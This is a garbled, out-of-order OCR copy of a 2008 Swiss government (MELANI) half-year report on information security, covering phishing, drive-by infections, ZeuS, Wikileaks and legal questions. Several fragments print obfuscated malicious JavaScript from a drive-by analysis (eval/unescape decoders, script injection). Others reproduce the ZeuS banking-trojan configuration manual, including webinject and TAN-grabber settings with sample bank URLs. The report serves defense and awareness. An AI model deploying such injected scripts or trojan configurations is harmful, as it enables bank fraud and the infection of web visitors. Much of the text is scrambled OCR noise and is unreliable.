23. 14 M rz 2008 wurde beispielsweise eine unbekannte Anzahl E Mails mit dem Betreff Nachricht ber eine radioaktive Kontamination in der Schweiz verschickt Nach dem Anklicken des darin enthaltenen Links wurde der Empf nger dazu aufgefordert eine Datei zu installieren um sich ein Video des Ungl cks anzusehen In Tat und Wahrheit handelte es sich bei der Datei aber um eine Malware 13 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international BB Nachricht uber eine radioaktive Kontamination in der Schweiz Nachricht Nur Text Date Bearbeiten Ansicht Einf gen Format Extras Aktionen 2 ii Antworten Alen antworten Lap Weiterieten cd EECHER AAA AC oO BE Von Gesendet Fr 14 03 2008 1209 An Ce Betreff Nachricht uber eine radioaktive Kantaminaton in der Schweiz Auf Internetforums erschienen Nachrichten uber eine gewaltige Explosion auf dem Schweizer Alomkraftwerk um Genf herum die nach den Worten von Augenzeugen am 12 Marz etwa um 15 Uhr stattgefunden hatte Im Einzelnen machte eine Burgenin dieser Stadt einen teleforeschen Anruf und teilte ihren Verwandten mit dass in der Stadt der ohm abgesperrt werde damit man keinen Menschen anrufen konnte Sie behauptet dass es auf dem Atomkraftwerk wirkich eine Explosion gegeben habe und dabei eine sehr machtige und dass eine Strahlungswotke erstrecke sich jetz In privaten Gesprachen wird diese Information von Amistragern inof
24. 2 da 3d 22fqb0 ugO0Qbbqi87e 257F7 3c7tfu7 3 c7dxb7 3c7v yb7 3c7fy v7 3 c7 huc7 3c7fuc7 3c 7wxd7 3c7u y7 3c7ud 7 3c7 uf7 3c7dgu7 9 fqbO ugOQbbqi 87q7 3c7 r7 3c7s7 3c7t 7 3 c7u7 3c7Vv7 3c7w7 3c7x7 3c7y7 3c727 3c7 7 3c7 7 we3c7 7 3c7 7 3c7 257F7 3c7 7 3c 7a7 3qc7b7 3c7c7 307 2 2 dd 3d 22 Sx 3ctSx 3c yv8d K7i7M 25u22 2520 2520 27 9kd K7di7M0 0 2522 2520 2520 27 m S 8d K7t7M 3cd K7 7M 3cd K7i7M9 iSx K888 d K7i7 M6 2520hQQ9 49 50 amp 5 95 0 2522 amp M iSx 2522 K88 88d K7i7 M6 2520h 9 49 4 950 25209M Sa x 22 d c 3d 220 d K7t 7M t 3ewudTqdu 89 3d8t 3ewudT qi899 yv8 d K7t7M 25209d K7t7M d K7 7Mt 3ewu d 257F d x89 ve sdy a 257F 0S 8t 3c 3ci9kfgbOb 888i 8 t99 8 Nt9 9 t9 budeb Ob mfqb0t 7fuc x3 257Fh 3es 25 7F 7 f qbOiSx 3ciSx 2522 3c 22 de 3d 22 K88d K7 7M Y 950 2522 259M yv888d K7t7 M 25229 25209 6688d K7t7M 25229 99tSx K8d K7t7M50 25209M54 u cu0tSx K88d K7t7M 8 amp 950 2522 279M 4 3eb u qsu8t 3ciSx 2522 Sx w iSx tSx Kd K7 7M 3d M 7 3 es 257F 79 2 2 cb 3d 22e 2564s 2 53bs t 253dt 256d 2570 253d 252 7 2527 for i 253d0 i 2 53cds 256caden 22 d z3d 22 2566u 256e 2563tioax 256e 2564 w e252 8t 2563 a 2 53d 25 27 252564 2525 6f 252563u me 25 256et 252577r 2569t 252565 2525 22 25 27 c e 2 53d 2 527 252 522 2 527 cb 253d 25 27 25253c scr 2525 69 252570t 25256ca 25256 25659 25257 2535a 25256 2537e 25253d 25255c 2525 25322 256aa 2576a 2 52573c 2572 2569 2525
25. 64032579 125645 842573 GVZSTIVZSI dust S6mesTS 73082 S61 ps 22 dar Ae 222460 ugOchbqiS7e sIST MN Aer gu ME Ee Jc huc Ke E a E A E ar Jo ET ugOcbbgierg7iIcTrTiIcT ihIcTL E Ee Ee o nien IC TYTS ee Ae THIOT e A eh Aen EEN Ae THSCTATY Ae TD PN SCPE TA e7422 ddt Af 22 1 SHI TCCSxd 3c eyved K717R 42522425201 ZS 2 75kd ad TEE E H ae EH K7 TH Ica KR KE EE EEN a EK MN H CHNMEIMI EE ET a TE EE ET A TT KPC IM d dk HEH e CT z 1eve adyr257F 08 03 Ic 1 1 9ktb b 60917 O68 t99 58 NL9 9 t9 budeb Obmtgb r Ttuc 3257Fhr eat2377 fb e A Ae en din Icv22 7 gen Ids22 KOGA PET MMs SSORTSZZAZSOMeyvOOOd K7c DATT A DE 99t 3x KOA E MAT H KOO K7c PM C9SO87S229279N 4 4 SJebu qeusts301Sxt2522 5 Sx 15x 2c8507 KA ET WMV IAI Ms Th Jeah257F 794822 che 3ds2Ze 125645 2SIDstsISIdce2SGde2S7Oe2S3de2 52742527 for 1125940 1 259043 12565cent22 der3ak2212566ut256et255Ir101256e WZ2SGdwe2S2Ec 42563a1253412527625255412525621252563umer25256er 1252577E12569712525651 125252242527 c42 534425274252522 1252 7 cb125341 25272252 5Ienerr2525691252570r 325256car2525612565912525712595nr25256325370r252534r252 55042525 4253223256nn12376nr2325790323723256932825708328235c32928522129233e323275ccH25341252 712525903232 95c3292 22ncr1p3257432523Jer2927 evals2i2 une 25730a 257032565 t4252925292574 322 0d4244 2234042 5744252b1 2559421574 1n4 2567 2r3256242564Ch256042561rCod2564e 125289 2574mp I22 cutjdt22 p b4g meq 6b g v x m
26. 70t 25255c 252522 25253e 2527 cc 253d 2527 25253Cc 25255c 25252fscrip 2574 2 5253e 2527 eval 2528une 2573ca 2570 2565 t 2529 2529 257d 22 cd 3d 223ds 2574 252b 2553 2574rin 2567 fr 256f 2564C 2568 2561rC0 2564e 2528 2574mp 22 cu 3d 22 p bAg mxq 6b g v x m ppqz6 rfuyq4gf w 6 d bagx l w y xp sfs 64c p 25 4lqa s rfuyq p b 22 5t 3d 22 2573 253d 2522 253dst 253b 2564c 2573 2564 2561 252b 2564b 252b 2564 2563 252b 2564d 252b 2564e 252c1 2530 253b 2564 2577 2573 2574 253b 2573 2574 253d 253b 2522 253b 22 db 3d 2247 3c7e7 3c7f7 3c797 3c7h7 3c7i7 3 c7j79 fqb0 ug0Qbbqi8 3c 2522 3c 3 c 36 25 3 c amp 3C 2 7 3c 3c 9 fq bNd ugOQbbqi89 fqbOt ugO Tq du8 9 d K7i7Ma t 3ewudVel luqb89 yv8t 3ewu dTqi89 9d K7t7M 3 ewudTqd u8 9 3d8t 3ewudTqi 89 25229 ulc u 22 ce 3 d 22 2563har 25430 256 4e A 2574 25 30 2528 252 70 2 578 2 5300 2 527 e s 2tzr529 3 22 cc 3d 22 2567th 2569 25291tm 2570 253dds 51 2569c 2565 2569 1 252b1 2529 5 2574 25 22 0p 34 22 2524 253d 2522 2564w 2564c5 2528cUu 25314 2529 2522 22 02 3d 22 2566 2575n 2563ti 25 6f 256ecZ2 2528c 257a 2572et 2575rn 2520c 2561 252bcb 2563 2563 2563d c 2565C 257a 2536 22 69 66 d 6fc 75 6den 74 630 6fki 65 69nd 65x0 66 28 27vbul 6c 65 74in_ 6dult 69qu 6fte 3d 27 3d 3d sc 27vbu 6c 6ce 74i 6e 5fnbomul 74iq 750t 65 3d 27 3 2 7 3b aw65 va 6c 75nes 63ape 2 8dz 63z 6fp 2b 73 74 a 27d 77 d 7a cz 28 73dt 29 3b 2 7 3 el 7 3e 2 4 3d
27. Bezeichnet ein Programm das bestimmte Aktionen nach dem Empfang eines Be fehls selbstst ndig ausf hrt Sogenannte Malicious Bots k nnen kompromittierte Systeme fernsteuern und zur Durchf hrung belie biger Aktionen veranlassen Botnetz Eine Ansammlung von Computern die mit Malicious Bots infiziert sind Diese lassen sich durch einen Angreifer den Botnetzbesit zer komplett fernsteuern Je nach Gr sse kann ein Botnetz aus einigen Hundert bis Millionen kompromittierter Rechner bestehen Defacement Verunstaltung von Webseiten DNS Domain Name System Mit Hilfe von DNS werden das Internet und deren Dienste benut zerfreundlich da die Benutzer anstelle von IP Adressen Namen verwenden k nnen z B www melani admin ch Der DNS Dienst bersetzt dabei den Namen in die dazugeh rende IP Adresse DoS Attacke DDos Attacke Denial of Service Attacke Distributed Denial of Service Attacke Hat zum Ziel einen bestimmten Dienst f r deren Benutzer uner reichbar zu machen oder zumindest die Erreichbarkeit des Diens tes erheblich einzuschr nken Eine DDoS Attacke ist eine Dos Attacke bei der das Opfer von vielen verschiedenen Systemen aus gleichzeitig angegriffen wird Downloader Kann zu einer Infektion mit einem b sartigen Programm f hren Der Downloader l dt in diesem Fall den eigentlichen Virus Troja MELANI Halbjahresbericht 20091 30 52 Informationssicherung Lage in der Schweiz un
28. I Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international stehen m sse Das Gericht verlangte weiter dass auf Computern welche von mehreren Personen genutzt werden f r jeden Nutzer ein Konto mit eigenem Passwort eingerichtet werden m sse Im neuesten Urteil vom 1 Juli 2008 erteilt das Oberlandgericht Frankfurt am Main dieser Sichtweise jedoch eine Absage Eine uneingeschr nkte Haftung des WLAN Inhabers ginge deutlich zu weit Zwar treffe jedermann die Pflicht sich rechtm ig und ge setzm ig zu verhalten Diese Pflicht k nne aber nicht auf Grundlage der St rerhaftung berm ssig auf eine Haftung f r unbekannte Dritte ausgedehnt werden Gem ss Einsch tzung von KOBIK ist es in der Schweiz zum jetzigen Zeitpunkt nicht denk bar dass ein Betreiber eines WLANs strafrechtlich zur Verantwortung gezogen w rde Auch eine Haftung gem ss Art 41 OR Wer einem andern widerrechtlich Schaden zuf gt sei es mit Absicht sei es aus Fahrl ssigkeit wird ihm zum Ersatze verpflichtet ist in der Schweiz zum heutigen Zeitpunkt unwahrscheinlich Dies bedeutet aber nicht dass die Prob lematik von offenen WLANs im rechtlichen Alltag keine Schwierigkeiten bereiten w rde Zu dem k nnen bei einem Missbrauch eines Funknetzwerkes in jedem Falle einige Unannehm lichkeiten auf den Betreiber zukommen Wird ber sein Funknetz eine Straftat begangen taucht diese IP Adresse notgedrungen bei den ermittelnd
29. ITANELA Se SENSO 7a PTET SEMI Och Gis abobel EIN SIvVSISvOVSS ON Tar 3D ER document cookie sndexOl vbulletin multiquote Ie 1 ee vbublecin multiquotes 2 7 zaval unnsonpe dzicstopest du derce Srat gt pelset function sc cem v ed var exdenew Date exd RetDate enxd getDate ed document enukiesenme sescape v sexpirer sexd boG eTString e I j Der dechiffrierte Code der ersten Stufe erscheint im unteren Fenster und wird mittels Co py6Paste in ein neues Source Fenster kopiert hier zu Illustrationszwecken etwas umforma tiert was aber nicht notwendig ist Team Gus ectis tn 464047 4642 e873 AN 7IH IAuN Geeh 7IchE1p z da 2an0 ugD bbqisTe r TFT lt Te fut lt Taub 7 lt Pvyb lt PL yy lt Thue lt Ttuc F lt KE E TTT E et KS C7 IVETTE TETT TePAICTHT CTS ul ade Sx lt eSx lt eyvOd KPA 7M S222020 Dea KPA THO O8ZZN2O8ZO een 1 3 Sai KTE THC K7 TACA KT M e Sx t REEDA RTL INS Ob 1 BSOSSHMOSOVII CM Sur 22 RISBA KTATINE 82Onam 9 971 950 S209M 8x Jace 0d K7e7H t gt wudTqdulS 8t gt wudTqi099 yvGd K7t 7H 32094 ETC 1 K7 7N t gt wud WTF ax09 ewe gaan 7F 05 Ot lt lt 1SkfqhOb 6061 08109920 Ne91 92 t9 budeb Ob mfqhOt fucl traat TF TetqndiSx lt iSxs22 lt 3 de RBB K7 7 1 1202 Seu ERAI K7C 7R 4229 t2096699d KIC TH t229 1 PHCSx KSA KIETASO rh Oe culcSx KIGA KITI
30. R ep 22 Ped dobu qauSc lt aSxe22 1 Sx Sx FESR IRA KI Te IN Poa TF 790 ebe 4 640 beta Ides Gin 70894127427 for 249002 ee 5 deen dze 1 66ur Ger 6IE io Ge kint IH GIMUIAND TH TSEANTSELVZSEI umes 2 Shet 2577r GSCI SES 2522427 ceH AN 2742522 427 cbAIAh27123Icscr4256912570r 1256cat 2564654 ET Sa 2564 37e1259d1 255012513224 Goad 76ah257Ich 72LEPL25T70CH255CH2522425Ieh277cchIdk2 712530425504 KA EE evels2Gunes 7Icav KEE KC Tiet jede 34a1 Z Zb sah ie Am Zrx i dCk n irCen Gde NZ Timp Jeue pi bag mxq gt givix ppas efupatgty 6 a sbaget Levi ysxpseta dep 1 88S4iqial 8 sl efuyq pibers are 7308 3de22 4 Sots Ihr 646379 4649 619 2s GAs EE IO Ihr E4877 479974 8 IDVIIG TANI ALL Ibt ys Adera eege 797 lt 774757679 PEL Qhd ugOCng t lt 822 lt 8 lt 8 lt te lt lt SeqbOd ugdhbqi09 fqb0e ug0TqdulS d K717M t gt wudVe luqhOS yvOt gt wudTqi6S Mad KIC Ren gt wudTqdulS St gt wudTqi09 4229eujcu s ler GShack dot S4eA 74 835 425N2700 781 30002 Tees 429 19 s Accent 67ch 4 6940829 cat 708 Sade a1 69er 65 469 INDIVID ON 741 eben is 9ar 228540 a dean Z 914 t eer GOS TEs d n fe CokZGcd Tal 8 Pets Tra Zen d La bebe BIN 63 48 EIdect B sch 7a Ir ac vbulletin mulesquote 2 7 7 eval unescape dz czt opent dw deren feat 2 der function c om v ed 4 var exd new Date exd setDate exd gerDate ed document coo
31. Schweizerische Eidgenossenschaft Informatikstrategieorgan Bund ISB Conf d ration suisse Bundesamt f r Polizei fedpol Confederazione Svizzera 5 Melde und Analysestelle Informationssicherung MELANI Confederaziun svizra www melani admin ch Informationssicherung Lage in der Schweiz und international Halbjahresbericht 2008 1 Januar Juni In Zusammenarbeit mit Koordinationsstelle zur Bek mpfung 9 H der Internet Kriminalitat Le service national de coordination de la HOG lutte contre la criminalit sur Internet Il Servizio nazionale di coordinazione per la lotta contro la criminalita su Internet The Swiss Coordination Unit for Cybercrime Control Informationssicherung Lage in der Schweiz und international Inhaltsverzeichnis 1 Einleitung EE 5 2 Aktuelle Lage Gefahren und Risiken usuusssnnnsnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnannnnnnnnnnnnnnnnnn 6 2 1 Von der IT Sicherheit zur Intormmatonseicherung nenn 6 2 2 Massenhacks legitimer VWebeseiten nn nnnnnnnennnnnnnnnnnnnnnnnnnnnnn nn 7 2 3 Politisch motiviertes Hacking 4 a EE 8 3 Tendenzen Allgemeine Entwicklungen suunnnnennnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn nn 9 3 1 Offene Funknetzwerke als Sicherheitsrisiko sn nnnnnnnnnennnnnn nennen 9 3 2 Soziale Netzwerke und die Gefahr des Datenmssbrauchs 4444 10 3 3 Commodity Malware und Commoditv Hacking 11 4 Aktuelle Lage IKT Infrastruktur national uuusuu
32. Wissen nicht an die zensierte Presse in ihrer Heimat weiterleiten k nnen Wikileaks will jedoch auch all jenen zur Seite stehen die unethisches Verhalten in ihren eigenen Regierungen und Unternehmen enth llen wollen Wikileaks selbst garantiert nicht f r die Echtheit der Dokumente und berl sst es den Lesern weitere Nachforschungen anzustellen Am 15 Februar 2008 wurde die Dom ne wikileaks org auf Grund einer einstweiligen Verf gung eines kalifornischen Richters an den betreffenden Registrar gesperrt Ausschlagge bend daf r war die Ver ffentlichung von spezifischen Dokumenten Ein ehemaliger Mitarbei ter der Julius B r Bank Filiale auf Cayman Islands hatte die Bank beschuldigt an Geldw scherei und Steuerhinterziehung ihrer Kunden beteiligt gewesen zu sein Dokumente dazu wurden auf der Webseite wikileaks org platziert Die Dokumente enthielten Korrespondenz interne Memos und Kalkulationen der Bank Laut Julius B r handelte es sich dabei um einen MELANI Halbjahresbericht 20091 17152 Informationssicherung Lage in der Schweiz und international Mix aus gestohlenen Akten welche teilweise verfalscht worden seien sowie generischen Falschungen Julius Bar klagte gegen die Publikation und erreichte die zwischenzeitliche Sperrung der Dom ne durch einen US Richter Dagegen regte sich schwerer Widerstand seitens amerikanischer Burgerrechtsorganisationen sowie der Medien Die Sperrung ver stosse gegen das Recht auf f
33. ask URL beim Ubergang auf welche die TAN in den POST Daten gesucht werden soll Schalter bestimmt die Hauptbedingung des Erhalts der TAN kann aus mehreren Schaltern in beliebi ger Reihenfolge bestehen allerdings wird die Gross Kleinschreibung ber cksichtigt case sensitive Al le gemeinsam erlauben eine eine genauere Bestimmung der TAN Derzeit sind folgende Schalter ver f gbar o Sxx legt fest nach welcher Anzahl ausgelassener TANs die TAN ausgetauscht werden muss xx Zahl o zwischen 1 und 99 die diese Anzahl angibt o Rxx legt fest dass die Bezeichnung der TAN in den POST Daten variabel ist und erm glicht es das Auffinden der TAN nach der Position zu bestimmen xx Zahl zwischen 1 und 99 die diese Position angibt o Cxx legt die Anzahl der Ziffern in der TAN fest xx Zahl zwischen 1 und 9 Whitemask POST Mask derjenigen an die URL bergebenen POST Daten bei deren Vorliegen der TAN Grabber ausgef hrt wird Blackmask POST Mask derjenigen an die URL bergebenen POST Daten bei deren Vorliegen der TAN Grabber ausgef hrt wird Bezeichnung des Wertes Wenn Sie die Schalter R oder C nicht gesetzt haben so muss hier unbe dingt die Bezeichnung derjenigen Variablen in den POST Daten angegeben werden welche die TAN erh lt es kann eine Mask verwendet werden Funktions Algorithmus des TAN Grabbers OahoOns Suche der URL in der Konfigurationsdatei Pr fung der POST Daten Pr fung
34. atei besteht aus den beiden Abschnitten StaticConfig und DynamicConfig StaticConfig Die Werte dieses Abschnitts werden direkt in die Bot Datei d h die exe Datei geschrieben sie definieren das grunds tzliche Verhalten des Bots auf dem Rechner des Opfers Je nach Ihrer Paketzusammenstellung k nnen einige der Parameter f r Sie ohne Bedeutung sein alle bedeut samen Parameter sind in dem Beispiel das dem Softwarepaket beiliegt ausgef hrt e botnet Zeile legt die Bezeichnung des Botnets fest zu dem der Bot geh rt Zeile Bezeichnung des Botnets bis zu 4 Zeichen oder 0 f r den Defaultwert Empfohlener Wert botnet 0 e timer_config Wert1 Wert2 bestimmt die Zeitspanne innerhalb deren die Erneuerung der Konfigu rationsdatei empfangen werden soll Wert1 bestimmt die Zeit in Minuten innerhalb deren die Konfigurationsdatei erneuert werden soll falls sie beim letzten Mal erfolgreich geladen wurde Wert2 bestimmt die Zeit in Minuten innerhalb deren die Konfigurationsdatei erneuert werden soll falls es beim letzten Laden zu Fehlern gekommen ist Empfohlener Wert timer_config 60 5 e _timer_logs Wert1 Wert2 bestimmt die Zeitspanne innerhalb deren die angesammelten Logs an den Server gesendet werden sollen Wert1 bestimmt die Zeit in Minuten innerhalb deren die Logs gesendet werden sollen falls die letzte bertragung erfolgreich war Wert2 bestimmt die Zeit in Minuten innerhalb deren die Log
35. auf Sicherheitsrisiken zu berpr fen und sie gegebenenfalls anzupassen MELANI empfiehlt ausserdem Web und Serveradministratoren s mtliche Updates und Patches raschm glichst einzuspielen und zwar sowohl f r die auf ihrer Webseite eingesetzte Software als auch f r den Webserver selbst Auch werden FTP Zugangsdaten zu Webseiten im grossen Stil gesammelt Dies kann bei spielsweise durch eine Schadsoftware Keylogger geschehen welche auf dem Computer installiert ist auf dem die Webseite administriert wird 4 4 Diverses EURO 2008 nur begrenzt durch Cyberkrminelle ausgenutzt W hrend der EURO 2008 wurde mit Aktivit ten von Cyber Kriminellen gerechnet welche die EURO als Trittbrett f r ihre kriminellen Machenschaften missbrauchen w rden Diese Aktivi t ten hielten sich aber in engen Grenzen Einzelne Vorkommnisse sind nachfolgend aufge f hrt euroticketshop com Ende M rz 2008 ist es Hackern gelungen die Bestellseite der viel besuchten Ticketb rse euroticketshop com so zu manipulieren dass die Besucher via Drive By Infektion mit dem Trojaner TR Dldr Small hzj infiziert wurden Dieser konnte je nach Bedarf des Angreifers weitere Schadsoftware mit verschiedensten Funktionen herunterladen Wie viele Computer auf dieser Seite infiziert worden sind ist unbekannt sleep in ch Die Schweizer Webseite sleep in ch auf der private Gastgeber f r die EURO 2008 Schlaf gelegenheiten angeboten haben ist nach eigenen A
36. bgiS Tens ET Lu lt gel Wvyb Te TZ yv Te Thue 7a Zuse wx lt Tay Pe Tad 7 EK AE EE D H A ji TE Ka S683 2 0 09926 NTS 89 cd ebudeb DbemeqhOt 7Tfuc Than TF TefqhOsSx lt sSxel lt pideen KSA K7 TR I SEO g KIr Ren 29 209555 KITIN 3229 PPLIx KOA Ei TSO 2OSMeu eut s KIGA KIL TI n 24 PNA dbu Iqsu r lt isuh22 1 Sn 150 tur Map RP MMe Be Pes IF TH sche te r ta bag d ME 648908 341293275 for 13940 25 Jods V cen Lie MOUs GeIGItiovse VH4wsIHe 3 6IasIGe27S 2 6422 90232 SOSumev 2 HGet LISP PTs OHI 7565 SPS2IIIA7ces3a A2T42522 927 chh3dn2 78 25Icscer4256F12570t 4256cah2561 ESQVISTAIS avy 256 37e1259d4235cH 2151 J22 4 daat 7EaN257ICH 72LEFH25TOLH23SCH2 32712 SIeN 2 71ccH3d427 W2SJoULSSovlS2facrips 74L25Ier277evali KEE KC ans T Zb SIV TAL ins ET Tee Slt GAC G Slot de dE Timp cue pihig Seng Sb Givi x m 1 ppges 1 efuygigty j og 7bagsrirvigixpiatsi eip Il Igal F 2 efuyg zp be peters et Aen Et Ser Ibt den 73 HAN EL IDs db RSH 601 63 268 ddt bt 64er ech Ak 335804477 87IS TH Ebt 79S THN IAES ISIS SE ke KE EC PCTs KE THEE Om KM ME fatal ugOGhhqiSS fqnot ugOTqaulSed ET 7N t gt wudVes LaghOSeyvOt gt wudT qi 09 09d EI HE rb Futur DE gt vudTqibS 3229 u cu rees 6 beta d 4 SHAN 74 930 92682708 TES IOOV2 4ER 429 11 We ATTA 6Se d29 tad 70V Pda 214690365 469 11251429 497 ger 244 IA 221 u t Giest Seu 4214 4297 EE TSMNE
37. binject ausf hren bei POST Anfrage der URL o G Webinject ausf hren bei POST Anfrage der URL sic Anm d o L ndert den Zweck des Webinject wenn dieser Schalter gesetzt wird wird der gew nschte Daten Ausschnitt erhalten und unverz glich im Log gespeichert e Blackmask POST Mask derjenigen an die URL bergebenen POST Daten bei deren Vorliegen das Webinject nicht ausgef hrt wird e Whitemask POST Mask derjenigen an die URL bergebenen POST Daten bei deren Vorliegen das Webinject ausgef hrt wird Nach der Angabe der URL folgt aber der n chsten Zeile eine Auflistung der Webinjects die bis zum Dateiende reicht oder bis zur Angabe einer neuen URL mittels eines weiteren Eintrags vom Typ set_url Einen Webinject besteht aus drei Elementen e Ohne Schalter L o data betore Mask der Daten nach denen neue Daten aufgezeichnet werden sollen o data after Mask der Daten vor denen neue Daten aufgezeichnet werden sollen o data_inject neue Daten die das zwischen data_before und data_after Enthaltene ersetzen werden e Mit Schalter L o data_before Mask der Daten nach denen der Ausschnitt der zu erhaltenden Daten beginnt o data_after Mask der Daten vor denen der Ausschnitt der zu erhaltenden Daten endet o data_inject hat die Funktion des Kopfteils f r die zu erhaltenden Daten dient lediglich zur vi suellen Hervorhebung in den Logs Beispiele set_url https www e gold com acct balance as
38. cee EShart 4308 g ien 74 430 826027007 OOo WN TCh 4 6944820 ten ON IA a N DH ope S248 Jarat tu ia en deu 924 829 SEWN GEN TSns SIE 246L86e czt28ct7a 472 eval uneacape d2 C2 0p aT dw de ez Doppelklicks auf die 4 Elemente enth llen schliesslich mehrere Code Fragmente A function dw t ca 64 6f 63ume 6et 7 7rit 65 22 ce 22 cb 3cscr 69 70t 6ca beg 75a 67Ee 3d 5c 22java 73cri 70t 5c h22 3e cc 3c h5cH2Fscript 3e eval unescapett function cz cz return ca cb cc cd ce cz dw dcs cu 14 st st des da db dc dd de 10 dw st st dw dz cz st B fast identisch zu A aber weitergehender decodiert function dw t ca 64 6f 63ume 6et 7 7rit 65 22 ce 22 cb 3cscr 69 70t A6ca 6eg 75a 67e 3d 5c 22java 7 3cri 70t 5C 22 3e cc 3c 5c 2fscript 3e eval unescape t function dcs ds es ds unescape ds st tmp for i 0 i lt ds length i tmp ds slice i i 1 st st Stri ng fromCharCode tmp charCodeAt 0 0x00 es dw dcs cu 14 st dcs da db dc dd de 10 dw st st C undefined 51 52 MELANI Halbjahresbericht 2008 1 Informationssicherung Lage in der Schweiz und international D var m9 new Array uno dve thr fir vif xes ves ght eni etn lev twe var 9 new Array a b c d e f g h i j k I m n o p q r s t u v w x y z var n9 new Array 1 2 3 4
39. chen Informationen zum Schengener Abkommen f r die ffentlichkeit einsehbar Das Papier enthielt Antworten der Schweizer Bundesbeh rden auf ber 200 Fragen zur Umsetzung der Schengen Vorschriften Darunter befanden sich detaillierte Angaben zum Vorgehen der Schweiz gegen Hehlerbanden Dro genschmuggler und Schlepper zu Sicherheitsmassnahmen an Flugh fen sowie zu den Schweizer Zugangspunkten zum Schengener Informationssystem SIS Der Botschafter der EU Kommission f r die Schweiz und Liechtenstein Michael Reiterer hat dem Dokument einen niedrigen Grad an Vertraulichkeit beigemessen Die Auswirkungen in diesem Fall scheinen also gering gewesen zu sein Trotzdem zeigt dieses Beispiel dass es nicht reicht Daten gegen einen unerlaubten Zugriff von aussen zu sch tzen Genauso wichtig ist es in entsprechenden Richtlinien zu definieren welche Personen Zugriff auf ge sch tzte Dokumente haben respektive diese bearbeiten oder ver ffentlichen d rfen So ist es beispielsweise nicht sinnvoll allen Personen Zugriff zu allen Dokumenten zu gew hren Ein personenabh ngiger Zugriff ist vorzuziehen wobei es zu bedenken gibt welches Doku ment f r die Arbeit welcher Person notwendig ist 4 2 Attacken Regelm ssige Spam E Mails zielen auf E Banking Applikationen Im ersten Halbjahr 2008 wurden zahlreiche Spam Wellen beobachtet welche mit Malware ausger stet waren und auf E Banking Applikationen zielten Am 7 Januar 2008 und am
40. d international ner usw nach und startet diesen auf dem infizierten System Drive by Infektion Infektion eines Computers mit Malware allein durch den Besuch einer Webseite Vielfach beinhalten die betroffenen Web Seiten seri se Angebote und sind zwecks Verteilung der Malware zuvor kompromittiert worden Die Infektion erfolgt meistens durch das Ausprobieren von Exploits f r vom Besucher noch nicht geschlos sene Sicherheitsl cken Exploit Code Exploit Ein Programm ein Script oder eine Codezeile mit der sich Schwachstellen in Computersystemen ausnutzen lassen Firewall Eine Firewall engl f r Brandmauer sch tzt Computersysteme indem sie ein und ausgehende Verbindungen berwacht und ge gebenenfalls zur ckweist Im Gegensatz dazu ist eine Personal Firewall auch Desktop Firewall f r den Schutz eines einzelnen Rechners ausgelegt und wird direkt auf dem zu sch tzenden Sys tem das heisst auf Ihrem Rechner installiert FTP File Transfer Protocol FTP ist ein Netzwerkprotokoll zur Datei bertragung ber TCP IP Netzwerke FTP kann beispielsweise verwendet werden um Webseiten auf einen Webserver zu laden IFrame Ein IFrame auch Inlineframe ist ein HTML Element das der Strukturierung von Webseiten dient Es wird benutzt um externe Webinhalte in der eigenen Homepage einzubinden IP Adresse Adresse welche einen Computer im Internet oder in einem ande ren TCP IP Netzwerk identif
41. des Wertes des Schalters S Suche der Variable mit der TAN Speicherung der TAN Ersetzung der TAN den in POST Daten und Fortsetzung der Ausf hrung der Abfrage 43 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Beispiele entry tangrabber e https banking sparkasse de cgi login cgi S3 tan end Die Beschreibung verschiedener Aspekte der Installation und Verwendung von ZeuS macht deutlich dass diese Software auch von Personen ohne besondere Fachkenntnisse benutzt werden kann Wer schon einmal eine PHP oder MySQL Anwendung verwendet hat wird weit reichende Ahnlichkeiten feststellen Das entspricht dem Professionalisierungskonzept der Akteure eine Gruppe entwickelt die Software und bietet diese auf dem Schwarzmarkt zum Verkauf an Eine weitere Gruppe generiert und verbreitet damit die Malware um ein Botnetz aufzubauen beispielsweise via Spam Mail Dieses wird dann von einer dritten Gruppe gemietet um E Banking Systeme anzugreifen und Money Mules anzuwerben Alle drei Akteure haben eines gemeinsam Sie betreiben eine kriminelle Tatigkeit um sich finan ziell zu bereichern 10 2 Drive by Infektionen Was sie sind und wie sie funktio nieren In den Halbjahresberichten 2007 1 und 2007 2 hat MELANI Uber Drive by Infektionen berich tet sowie Pr ventionm glichkeiten aus Sicht der Benutzer und der Webseiten Betreiber be schrieben Im Laufe des letzten Jahres ha
42. diese dazu beigetragen haben den Zeitrahmen zu beschleunigen und den Standort endg ltig festzulegen Auch wenn es schwierig bleiben wird die Urheber solcher Attacken ausfindig zu machen so ist eines klar Die Internetkriminalit t ist grenz berschrei tend und verlangt f r eine wirkungsvolle Bek mpfung nach internationaler Zusammenarbeit 28 Siehe daf r auch den MELANI Halbjahresbericht 2007 1 Kapitel 7 2 http www melani admin ch dokumentation 00123 00124 01029 index html lang de Stand 21 07 2008 29 F r weitere Informationen siehe auch http www economist com agenda displaystory cfm story_id 11778941 http www spiegel de netzwelt web 0 1518 560637 00 html und http www centrumforrattvisa se index php publisher articleview frmArticlelD 23 Stand 28 07 2008 3 Siehe zur Attacke gegen Estland den MELANI Halbjahresbericht 2007 1 Kapitel 5 1 http www melani admin ch dokumentation 00123 00124 01029 index html lang de Stand 28 07 2008 31 Siehe z B http news bbc co uk 2 hi europe 7401260 stm und http www heise de security Estland erhaelt NATO Excellence Center fuer C yber Defense news meldung 107879 Stand 08 07 2008 26 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Des Weiteren streben die Mitgliedstaaten dieses Zentrums auch die Erarbeitung einer recht lichen Definition von Cyber Attacken an Dass auch daf r ein Bedarf besteht wurd
43. diesem Angriff war dass bei einem normalen direkten Aufruf der Seite der 15 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Schadcode nicht ausgef hrt wurde sondern nur wenn die Seite via Suchmaschine aufgeru fen wurde siehe Kapitel 2 2 Als weitere Verschleierungsmassnahme hatte das b sartige JavaScript den gleichen Namen wie ein JavaScript welches von Google zwecks Webseiten Analyse Google Analytics verwendet wird Sogar die Dom ne auf der dieses Skript ge speichert war war dem offiziellen Google Namen zum Verwechseln hnlich und unterschied sich nur in der Top Level Dom ne Die Anzahl gehackter Webseiten wurde in diesem Fall auf etwa 1 000 gesch tzt Wie viele Personen sich in diesem Fall infiziert haben ist unbe kannt Auch andere Schweizer Webseiten wurden Opfer von Drive By Infektionen So wurden die Webauftritte des ehemaligen Walliser St nderates Simon Epiney simonepiney ch sowie der Gr 